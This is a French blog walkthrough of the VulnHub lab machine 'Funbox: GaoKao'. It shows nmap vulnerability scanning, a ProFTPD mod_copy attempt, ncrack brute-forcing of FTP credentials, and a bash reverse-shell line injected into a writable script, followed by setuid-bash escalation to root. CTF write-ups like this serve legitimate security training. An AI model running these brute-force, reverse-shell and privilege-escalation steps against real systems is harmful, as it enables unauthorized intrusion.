Accueil Solution du CTF Funbox GaoKao de VulnHub
Post
Annuler

Solution du CTF Funbox GaoKao de VulnHub

DIDNTREADLOL

Funbox: GaoKao est un CTF assez simple, il convient toutefois d’être attentif, ce qui par chance a été mon cas.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
$ sudo nmap -sCV --script vuln -T5 -p- 192.168.56.129
Starting Nmap 7.95 ( https://nmap.org )
Nmap scan report for 192.168.56.129
Host is up (0.000067s latency).
Not shown: 65531 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     ProFTPD 1.3.5e
| vulners: 
|   cpe:/a:proftpd:proftpd:1.3.5e: 
|       SAINT:FD1752E124A72FD3A26EEB9B315E8382  10.0    https://vulners.com/saint/SAINT:FD1752E124A72FD3A26EEB9B315E8382        *EXPLOIT*
|       SAINT:950EB68D408A40399926A4CCAD3CC62E  10.0    https://vulners.com/saint/SAINT:950EB68D408A40399926A4CCAD3CC62E        *EXPLOIT*
|       SAINT:63FB77B9136D48259E4F0D4CDA35E957  10.0    https://vulners.com/saint/SAINT:63FB77B9136D48259E4F0D4CDA35E957        *EXPLOIT*
|       SAINT:1B08F4664C428B180EEC9617B41D9A2C  10.0    https://vulners.com/saint/SAINT:1B08F4664C428B180EEC9617B41D9A2C        *EXPLOIT*
|       PROFTPD_MOD_COPY        10.0    https://vulners.com/canvas/PROFTPD_MOD_COPY     *EXPLOIT*
--- snip ---
|       SSV:61050       5.0     https://vulners.com/seebug/SSV:61050    *EXPLOIT*
|_      CVE-2013-4359   5.0     https://vulners.com/cve/CVE-2013-4359
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| vulners: 
|   cpe:/a:openbsd:openssh:7.6p1: 
|       95499236-C9FE-56A6-9D7D-E943A24B633A    10.0    https://vulners.com/githubexploit/95499236-C9FE-56A6-9D7D-E943A24B633A  *EXPLOIT*
|       5E6968B4-DBD6-57FA-BF6E-D9B2219DB27A    10.0    https://vulners.com/githubexploit/5E6968B4-DBD6-57FA-BF6E-D9B2219DB27A  *EXPLOIT*
|       2C119FFA-ECE0-5E14-A4A4-354A2C38071A    10.0    https://vulners.com/githubexploit/2C119FFA-ECE0-5E14-A4A4-354A2C38071A  *EXPLOIT*
|       PACKETSTORM:173661      9.8     https://vulners.com/packetstorm/PACKETSTORM:173661      *EXPLOIT*
|       F0979183-AE88-53B4-86CF-3AF0523F3807    9.8     https://vulners.com/githubexploit/F0979183-AE88-53B4-86CF-3AF0523F3807  *EXPLOIT*
--- snip ---
|       PACKETSTORM:151227      0.0     https://vulners.com/packetstorm/PACKETSTORM:151227      *EXPLOIT*
|       PACKETSTORM:140261      0.0     https://vulners.com/packetstorm/PACKETSTORM:140261      *EXPLOIT*
|_      1337DAY-ID-30937        0.0     https://vulners.com/zdt/1337DAY-ID-30937        *EXPLOIT*
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| vulners: 
|   cpe:/a:apache:http_server:2.4.29: 
|       C94CBDE1-4CC5-5C06-9D18-23CAB216705E    10.0    https://vulners.com/githubexploit/C94CBDE1-4CC5-5C06-9D18-23CAB216705E  *EXPLOIT*
|       95499236-C9FE-56A6-9D7D-E943A24B633A    10.0    https://vulners.com/githubexploit/95499236-C9FE-56A6-9D7D-E943A24B633A  *EXPLOIT*
|       2C119FFA-ECE0-5E14-A4A4-354A2C38071A    10.0    https://vulners.com/githubexploit/2C119FFA-ECE0-5E14-A4A4-354A2C38071A  *EXPLOIT*
|       PACKETSTORM:181114      9.8     https://vulners.com/packetstorm/PACKETSTORM:181114      *EXPLOIT*
|       PACKETSTORM:176334      9.8     https://vulners.com/packetstorm/PACKETSTORM:176334      *EXPLOIT*
|       PACKETSTORM:171631      9.8     https://vulners.com/packetstorm/PACKETSTORM:171631      *EXPLOIT*
|       MSF:EXPLOIT-MULTI-HTTP-APACHE_NORMALIZE_PATH_RCE-       9.8     https://vulners.com/metasploit/MSF:EXPLOIT-MULTI-HTTP-APACHE_NORMALIZE_PATH_RCE-        *EXPLOIT*
|       MSF:AUXILIARY-SCANNER-HTTP-APACHE_NORMALIZE_PATH-       9.8     https://vulners.com/metasploit/MSF:AUXILIARY-SCANNER-HTTP-APACHE_NORMALIZE_PATH-        *EXPLOIT*
|       HTTPD:E8492EE5729E8FB514D3C0EE370C9BC6  9.8     https://vulners.com/httpd/HTTPD:E8492EE5729E8FB514D3C0EE370C9BC6
|       HTTPD:C072933AA965A86DA3E2C9172FFC1569  9.8     https://vulners.com/httpd/HTTPD:C072933AA965A86DA3E2C9172FFC1569
--- snip ---
|       PACKETSTORM:164418      0.0     https://vulners.com/packetstorm/PACKETSTORM:164418      *EXPLOIT*
|       PACKETSTORM:152441      0.0     https://vulners.com/packetstorm/PACKETSTORM:152441      *EXPLOIT*
|_      05403438-4985-5E78-A702-784E03F724D4    0.0     https://vulners.com/githubexploit/05403438-4985-5E78-A702-784E03F724D4  *EXPLOIT*
3306/tcp open  mysql   MySQL 5.7.34-0ubuntu0.18.04.1
MAC Address: 08:00:27:7C:BB:4D (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 61.67 seconds

N’ayant rien trouvé sur le serveur web, je me suis orienté vers le FTP.

Comme Nmap nous indique que le serveur est vulnérable à la faille mod_copy, j’en ai profité pour tester :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
$ ncat 192.168.56.129 21 -v
Ncat: Version 7.95 ( https://nmap.org/ncat )
Ncat: Connected to 192.168.56.129:21.
220 ProFTPD 1.3.5e Server (Debian) [::ffff:192.168.56.129]
site cpfr /etc/passwd
530 Please login with USER and PASS
USER anonymous
331 Anonymous login ok, send your complete email address as your password
PASS a@a
230-Welcome, archive user anonymous@192.168.56.1 !
230-
230-The local time is: Thu Jul 03 11:43:43 2025
230-
230-This is an experimental FTP server.  If you have any unusual problems,
230-please report them via e-mail to <sky@funbox9>.
230-
230 Anonymous access granted, restrictions apply
site cpfr /etc/passwd
550 /etc/passwd: No such file or directory

Ça n’a pas fonctionné, MAIS on a trouvé un nom d’utilisateur : sky.

1
2
3
4
5
6
7
8
9
10
$ ncrack -u sky -P wordlists/Top1575-probable-v2.txt ftp://192.168.56.129

Starting Ncrack 0.8 ( http://ncrack.org )

Discovered credentials for ftp on 192.168.56.129 21/tcp:
192.168.56.129 21/tcp ftp: 'sky' 'thebest'

Ncrack done: 1 service scanned in 146.98 seconds.

Ncrack finished.

Toujours pas d’accès SSH, mais le FTP l’accepte :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
$ ftp sky@192.168.56.129
Connected to 192.168.56.129.
220 ProFTPD 1.3.5e Server (Debian) [::ffff:192.168.56.129]
331 Password required for sky
Password: 
230 User sky logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -a
229 Entering Extended Passive Mode (|||38354|)
150 Opening ASCII mode data connection for file list
drwxr-xr-x   3 sky      sky          4096 Jun  6  2021 .
drwxr-xr-x   5 root     root         4096 Jun  5  2021 ..
-rw-------   1 sky      sky            56 Jun  5  2021 .bash_history
-r--r--r--   1 sky      sky           220 Jun  5  2021 .bash_logout
-r--r--r--   1 sky      sky          3771 Jun  5  2021 .bashrc
-r--r--r--   1 sky      sky           807 Jun  5  2021 .profile
drwxr-----   2 root     root         4096 Jun  5  2021 .ssh
-rwxr-x---   1 sky      sarah          66 Jun  6  2021 user.flag
-rw-------   1 sky      sky          1489 Jun  5  2021 .viminfo
226 Transfer complete
ftp> cd /home
250 CWD command successful
ftp> ls
229 Entering Extended Passive Mode (|||13933|)
150 Opening ASCII mode data connection for file list
drwxr-xr-x   4 lucy     lucy         4096 Jun  6  2021 lucy
dr-xr-xr-x   4 sarah    sarah        4096 Jun  6  2021 sarah
drwxr-xr-x   3 sky      sky          4096 Jun  6  2021 sky
226 Transfer complete

J’ai essayé de brute-forcer le mot de passe de ces deux utilisatrices, sans succès.

Au moins on a le premier flag :

1
2
!/bin/sh
echo "Your flag is:88jjggzzZhjJjkOIiu76TggHjoOIZTDsDSd"

J’ai retenté la faille mod_copy avec l’utilisateur, et c’est mieux ! Mais de là à en faire quelque chose, non.

1
2
3
4
5
6
7
8
9
10
11
12
$ ftp sky@192.168.56.129
Connected to 192.168.56.129.
220 ProFTPD 1.3.5e Server (Debian) [::ffff:192.168.56.129]
331 Password required for sky
Password: 
230 User sky logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> site cpfr /etc/passwd
350 File or directory exists, ready for destination name
ftp> site cpto /var/www/html/yolo.txt
550 cpto: Permission denied

Ensuite, l’utilisateur sky a un dossier .ssh dans son répertoire personnel. Le dossier appartient à root, mais grâce à une particularité des permissions Linux, je peux renommer ce dossier (car je possède le dossier parent) et créer un autre dossier .ssh à la place dans l’idée d’y placer un authorized_keys.

J’étais assez confiant mais…

1
2
$ ssh -i ~/.ssh/key_no_pass sky@192.168.56.129
sky@192.168.56.129's password:

GaoKao KO

Je suis finalement revenu à ce flag… Le fait que ce soit un script bash était trop louche. Je l’ai donc téléchargé, modifié pour ajouter cette commande, puis renvoyé :

1
bash -i >& /dev/tcp/192.168.56.1/80 0>&1

Finalement, j’avais une touche, et pas avec l’utilisateur attendu :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
$ sudo ncat -l -p 80 -v
Ncat: Version 7.95 ( https://nmap.org/ncat )
Ncat: Listening on [::]:80
Ncat: Listening on 0.0.0.0:80
Ncat: Connection from 192.168.56.129:46982.
bash: cannot set terminal process group (-1): Inappropriate ioctl for device
bash: no job control in this shell
bash-4.4$ ls
ls
bash-4.4$ pwd
pwd
/home/sarah
bash-4.4$ id
id
uid=1002(sarah) gid=1002(sarah) groups=1002(sarah)

Je me suis concentré manuellement sur les autres utilisateurs, processus, services avant de finalement lancer LinPEAS :

1
2
3
4
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
strings Not Found
-rwsr-sr-x 1 root root 1.1M Jun  6  2019 /bin/bash

bash en setuid root, jolie backdoor :)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
bash-4.4$ bash -p
bash-4.4# id
uid=1002(sarah) gid=1002(sarah) euid=0(root) egid=0(root) groups=0(root),1002(sarah)
bash-4.4# cd /root
bash-4.4# ls -al
total 28
drwx------  4 root root 4096 Jun  6  2021 .
drwxr-xr-x 24 root root 4096 Jun  5  2021 ..
-rw-------  1 root root    0 Jun  6  2021 .bash_history
-rw-r--r--  1 root root 3106 Apr  9  2018 .bashrc
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
drwx------  2 root root 4096 Jun  5  2021 .ssh
drwxr-xr-x  2 root root 4096 Jun  5  2021 .vim
-rw-------  1 root root    0 Jun  6  2021 .viminfo
-rw-r--r--  1 root root 2289 Jun  5  2021 root.flag
bash-4.4# cat root.flag


  █████▒█    ██  ███▄    █  ▄▄▄▄    ▒█████  ▒██   ██▒     ▄████  ▄▄▄       ▒█████   ██ ▄█▀▄▄▄       ▒█████  
▓██   ▒ ██  ▓██▒ ██ ▀█   █ ▓█████▄ ▒██▒  ██▒▒▒ █ █ ▒░    ██▒ ▀█▒▒████▄    ▒██▒  ██▒ ██▄█▒▒████▄    ▒██▒  ██▒
▒████ ░▓██  ▒██░▓██  ▀█ ██▒▒██▒ ▄██▒██░  ██▒░░  █   ░   ▒██░▄▄▄░▒██  ▀█▄  ▒██░  ██▒▓███▄░▒██  ▀█▄  ▒██░  ██▒
░▓█▒  ░▓▓█  ░██░▓██▒  ▐▌██▒▒██░█▀  ▒██   ██░ ░ █ █ ▒    ░▓█  ██▓░██▄▄▄▄██ ▒██   ██░▓██ █▄░██▄▄▄▄██ ▒██   ██░
░▒█░   ▒▒█████▓ ▒██░   ▓██░░▓█  ▀█▓░ ████▓▒░▒██▒ ▒██▒   ░▒▓███▀▒ ▓█   ▓██▒░ ████▓▒░▒██▒ █▄▓█   ▓██▒░ ████▓▒░
 ▒ ░   ░▒▓▒ ▒ ▒ ░ ▒░   ▒ ▒ ░▒▓███▀▒░ ▒░▒░▒░ ▒▒ ░ ░▓ ░    ░▒   ▒  ▒▒   ▓▒█░░ ▒░▒░▒░ ▒ ▒▒ ▓▒▒▒   ▓▒█░░ ▒░▒░▒░ 
 ░     ░░▒░ ░ ░ ░ ░░   ░ ▒░▒░▒   ░   ░ ▒ ▒░ ░░   ░▒ ░     ░   ░   ▒   ▒▒ ░  ░ ▒ ▒░ ░ ░▒ ▒░ ▒   ▒▒ ░  ░ ▒ ▒░ 
 ░ ░    ░░░ ░ ░    ░   ░ ░  ░    ░ ░ ░ ░ ▒   ░    ░     ░ ░   ░   ░   ▒   ░ ░ ░ ▒  ░ ░░ ░  ░   ▒   ░ ░ ░ ▒  
          ░              ░  ░          ░ ░   ░    ░           ░       ░  ░    ░ ░  ░  ░        ░  ░    ░ ░  
                                 ░                                                                          

You did it ! 
THX for playing Funbox: GAOKAO !

I look forward to see this screenshot on twitter: @0815R2d2
Cet article est sous licence CC BY 4.0 par l'auteur.